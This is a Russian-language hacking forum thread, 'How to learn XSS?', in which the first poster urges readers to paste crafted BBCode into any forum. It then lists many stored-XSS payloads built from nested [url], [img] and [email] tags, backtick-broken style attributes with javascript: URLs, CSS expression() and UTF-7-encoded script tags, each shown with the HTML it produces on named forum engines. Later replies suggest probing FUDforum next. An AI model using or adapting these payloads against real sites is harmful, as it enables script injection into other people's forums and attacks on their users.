|
Как научится Xss?
Как научится XSS?
А вот так, Берем вот эту комбинацию, и суём на любой форум. Код HTML:
[url]http://www.wj'"`.com[/url]Вот результат, Иду по списку... :rolleyes: http://www.foruminsider.com/index.php?act=directory Цитата:
Код HTML:
<dbml:font face="Edwardian "wj style=display:none;background:url(javascript:alert())>Код HTML:
<FONT face="Edwardian "wj style=display:none;background:url(javascript:alert())>[QUOTE]Powered by AppliedBB[.QUOTE] = Unrealesed. Цитата:
Код HTML:
[img]http://www.wj[img]http://www.wj.gif`=`[/img][/img]`style=`display:none;background:url(javascript:alert())`Код HTML:
<img src="http://www.wj<img src="http://www.wj.gif`=` border=0 />" border="0" />`style=`display:none;background:url(javascript:alert())`Цитата:
Код HTML:
[url]http://www.wj6[url=http://www.wj6.com`=`][/url][/url]`style=`display:none;background:url(javascript:alert())`Код HTML:
<a href="http://www.wj6<a href="http://www.wj6.com`=`" target="_blank">" target="_blank">http://www.wj6<a href="http://www.wj6.com`=`" target="_blank"></a></a>`style=`display:none;background:url(javascript:alert())`Цитата:
Код HTML:
+ADw-/title+AD4APA-script+AD4-alert(/WJ/)+ADsAPA-/script+AD4-Код HTML:
+ADw-/title+AD4APA-script+AD4-alert(/WJ/)+ADsAPA-/script+AD4-Цитата:
Код HTML:
[email]wj18@wj18[email=wj18@wj18.com`=`]wj18[/email].com[/email]`style=`display:none;background:url(javascript:alert())`Код HTML:
<a href="mailto:wj18@wj18<a href="mailto:wj18@wj18.com`=`">wj18">wj18@wj18[email=wj18@wj18.com`=`]wj18</a>.com</a>`style=`display:none;background:url(javascript:alert())`[/email]Код HTML:
[email]wj8@wj8[url=http://www.wj8.com/style=background:expression(alert());]wj8[/url].comКод HTML:
<a href="mailto:wj8@wj8<a href="http://www.wj8.com/style=background:expression(alert());" target="_blank">wj8</a>.com">wj8@wj8<a href="http://www.wj8.com/style=background:expression(alert());" target="_blank">wj8</a>.com</a>Цитата:
Код HTML:
[url=http://www.wj17[email=wj17@wj17`=`]wj17[/url]Код HTML:
[url=http://www.wj17[email=wj17@wj17`=`].com]wj17[/url]` style=`background:url(javaSCrip t:alert(/Hi_from_Algol/))`Код HTML:
<table width='95%' align='center' cellpadding='3' cellspacing='1' class='table'><tr><td class='type_t'><br><a target='_new' href="http://www.wj17<a href="mailto:wj17@wj17`=`">wj17[/email">.com]wj17</a>` style=`background:url(javaSCrip t:alert(/Hi_from_Algol/))`<br>[email]wj18@wj18[email=wj18@wj18.com]wj18</a>.com[/email]<br></td></tr></table>Цитата:
Код HTML:
[url]http://www.wj21[img]http://www.wj21/style=`background:url(javascript:alert(/Hi_from_Algol/))`.gif[/img].com[/url]Result. Код HTML:
<a href="http://www.wj21<img src="http://www.wj21/style=`background:url(javascript:alert(/Hi_from_Algol/))`.gif" alt="" style="border: 0;" />.com" target="_blank">http://www.wj21<img src="http://www.wj21/style=`background:url(javascript:alert(/Hi_from_Algol/))`.gif" alt="" style="border: 0;" />.com</a>Цитата:
Код HTML:
[email]wj3@wj3[url]http://www.wj3.com`=`[/url].com[/email]`style=`background:url(javascript:alert(/wj/));`Код HTML:
<font class="mfont"><a href="mailto:wj3@wj3<a href="http://www.wj3.com`=`">http://www.wj3.com`=`</a>.com">wj3@wj3<a href="http://www.wj3.com`=`">http://www.wj3.com`=`</a>.com</a>`style=`background:url(javascript:alert(/wj/));` </font>Цитата:
Код HTML:
[email]wj3@wj3[url]http://www.wj3.com`=`[/url].com[/email]`style=`background:url(javascript:alert(/wj/));`Код HTML:
<font class=ntext><a href="mailto:wj3@wj3<a href="http://www.wj3.com`=`?session=S2jGuGVITxFMy4Xk10fK8dc5jy" target=_top>http://www.wj3.com`=`</a>.com">wj3@wj3<a href="http://www.wj3.com`=`?session=S2jGuGVITxFMy4Xk10fK8dc5jy" target=_top>http://www.wj3.com`=`</a>.com</a>`style=`background:url(javascript:alert(/wj/));`</font>Цитата:
Код HTML:
[email=wj@wj.com wj=`]wj[/email]`style=`background:url(javascript:alert(/wj/));`Код HTML:
<email=wj@wj.com wj=`>wj</email>`style=`background:url(javascript:alert(/wj/));`</ul>Цитата:
Код HTML:
[email=wj@wj'"`.com wj=`]wj[/email]` style=`background:url(javaSCrip t:alert(/Hi_from_Algol/))`Код HTML:
<blockquote>Цитата:
Код HTML:
[img]http://www.wj10[url=http://www.wj10.com`=`]wj10[/url].gif[/img]` style=`dysplay:none;background:url(javaSCript:alert(/Hi_from_Algol/))`Код HTML:
<img src="http://www.wj10<a href="http://www.wj10.com`=`" title="www.wj10.com`=`" target="_new">wj10</a>.gif" border="0">` style=`dysplay:none;background:url(javaSCript:alert(/Hi_from_Algol/))`Цитата:
Код HTML:
[img]http://www.wj10[url=http://www.wj10.com`=`]wj10[/url].gif[/img]` style=`dysplay:none;background:url(javaSCript:alert(/Hi_from_Algol/))`Код HTML:
<img src="http://www.wj10<a href="http://www.wj10.com`=`" title="www.wj10.com`=`" target="_new">wj10</a>.gif" border="0">` style=`dysplay:none;background:url(javaSCript:alert(/Hi_from_Algol/))` |
wj FUDforum последний посмари !
|
Цитата:
|
всысле на FUdforum просто сморю во всяких разных находишь может и там найдешь
вот в таких fudforum.org/forum/ |
wj мне ето негорит я просто предложил типа идей у тебя же рвения и знания полно
а так я предпочитаю сам искать хоть долго зато понятно откуда и что |
Кстати давно приходила мысль, а не заморочится ли кому нить написанием сканера XSS - уязвимостей, типа nmap...с пополнением базы данных...
|
Xex
они есть |
смысли есть, но пока недоступны для общества?...
|
всмысле недоступны у гугля их полно
|
Цитата:
tys молодец !!! |
| Время: 07:30 |